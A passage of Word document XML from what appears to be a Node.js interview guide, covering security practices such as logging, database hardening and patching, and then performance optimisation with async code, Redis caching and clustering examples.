      </w:r>
    </w:p>
    <w:p w14:paraId="0C315C1C" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement robust logging to track access, errors, and suspicious activities. Use tools like Winston or Bunyan for logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA7529F" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor your application with tools like Prometheus, Grafana, or third-party services like Datadog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCCA378"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winston = require('winston');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7E206"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logger = winston.createLogger({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1996D932"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level: 'info',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1724E9"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format: winston.format.json(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EFDF00"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transports: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AF377"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new winston.transports.File({ filename: 'error.log', level: 'error' }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286B0EB9"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new winston.transports.File({ filename: 'combined.log' })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2097AA"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3672109" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868"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66B2CAA"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13. Secure Your Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289D39CB" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use strong, unique passwords for database accounts and avoid using the default ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BEF7E4" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Restrict database access to specific IP addresses or use a Virtual Private Cloud (VPC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6338A2D1" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encrypt sensitive data at rest and in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB2696"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14. Regularly Patch and Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2294093B" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Keep your Node.js version, dependencies, and operating system updated with the latest security patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2432F3E0" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15. Security Audits and Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C2B13D" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regularly conduct security audits and penetration testing to identify and address vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40799B87" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C60382"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41" w:name="_Toc178383224"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q40. How do you optimize the performance of a Node.js application?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="0D5519D6"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1. Efficient Code Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CCCBE9" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Blocking Code:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use asynchronous APIs to prevent blocking the event loop. Avoid synchronous operations like fs.readFileSync in favor of fs.readFile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB760B8" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimize Loops and Algorithms:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that loops and algorithms are efficient and avoid unnecessary computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090639BB" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use the Latest Node.js Version:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Newer versions of Node.js often come with performance improvements and new features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE167F7"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2. Leverage Asynchronous Programming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E4EF0" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Async/Await:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use async and await for cleaner and more readable asynchronous code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15072FB9" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promise.all:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Promise.all to run multiple asynchronous operations in parallel when possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBE7A36" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Callback Hell:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Refactor nested callbacks into Promises or use async/await.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39209338"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fetchData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BC8BA2"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294599D9"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[userData, postsData] = await Promise.all([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BE50F"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fetchUserData(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FF5860"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fetchPostsData()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE3250"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70D264B"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 process userData and postsData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E82CF36"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(error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53F46D"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fetching data:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED4E112"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7CB69D2"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1A787E9"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3. Optimize Database Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2315E1C5" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Indexes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure your database queries use indexes to speed up search operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982FA2A" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimize Queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write efficient queries and avoid unnecessary data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C3EE8E" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connection Pooling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use connection pooling to manage and reuse database connections efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A39A80"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4. Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6ADCF8" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In-Memory Caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use libraries like node-cache or lru-cache to cache frequently accessed data in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ABDFF9" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>External Caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement caching layers using Redis or Memcached for more scalable caching solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC310B" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example with Redis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C9283A"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redis = require('redis');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2718EE32"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client = redis.createClient();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0276C5B1"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218ABC64"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client.get('key', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626A1ECC"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1C2C5A1E"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(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C89FADA"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use cached data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046961C1"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59D7D399"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fetch data from source and cache it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD6E0C"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client.set('key', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3978E"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469EA38"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E4B32B2"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5. Load Balancing and Clustering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4B406" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>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 xml:space="preserve"> Distribute incoming traffic across multiple instances of your application using a load balancer (e.g., Nginx, HAProxy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB3076" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js Clustering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use the Node.js cluster module to take advantage of multi-core systems by running multiple instances of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7333D95B"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cluster = require('cluster');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27266109"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http = require('http');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06655C2E"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numCPUs = require('os').cpus().length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E163E"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AF837F1"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if (cluster.isMaster) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F86F648"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for (let i = 0; i &lt; numCPUs; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A33146"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cluster.fork();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA633DA"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52021E9"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cluster.on('exit', (worker, code, signal) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1E12E"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console.log(`Worker ${worker.process.pid} died`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E86D03"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3AAFAFB"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B68CC"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http.createServer((req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A00618"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res.writeHead(200);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66169219"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res.end('Hello World\n');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEFA416"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}).listen(8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26769771"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E9C8D6A"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6. Minimize Response Times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E9DA4C" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
